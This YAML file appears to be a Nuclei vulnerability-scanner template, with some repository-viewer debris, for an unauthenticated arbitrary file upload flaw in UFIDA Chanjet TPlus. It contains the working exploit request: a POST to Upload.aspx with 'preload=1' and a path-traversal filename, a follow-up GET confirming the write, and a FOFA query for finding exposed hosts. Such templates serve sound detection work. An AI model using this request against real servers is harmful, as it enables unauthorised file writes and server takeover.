43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
|
id: chanjet-tplus-fileupload
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
|
||
|
|
author: SleepingBag945
|
||
|
|
severity: critical
|
||
|
|
description: |
|
||
|
|
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
|
||
|
|
reference:
|
||
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
|
||
|
|
metadata:
|
||
|
|
max-request: 2
|
||
|
|
fofa-query: app="畅捷通-TPlus"
|
||
|
|
verified: true
|
||
|
|
tags: yonyou,chanjet,upload,intrusive
|
||
|
|
|
||
|
|
http:
|
||
|
|
- raw:
|
||
|
|
- |
|
||
|
|
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo
|
||
|
|
Accept-Encoding: gzip
|
||
|
|
|
||
|
|
------WebKitFormBoundaryuirnbcvo
|
||
|
|
Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg"
|
||
|
|
Content-Type: image/jpeg
|
||
|
|
|
||
|
|
{{randstr_2}}
|
||
|
|
------WebKitFormBoundaryuirnbcvo--
|
||
|
|
|
||
|
|
- |
|
||
|
|
GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
Accept-Encoding: gzip
|
||
|
|
|
||
|
|
matchers-condition: and
|
||
|
|
matchers:
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- "status_code_1==200 && status_code_2==200"
|
||
|
|
- "contains(body_2, '{{randstr_2}}')"
|
||
|
|
condition: and
|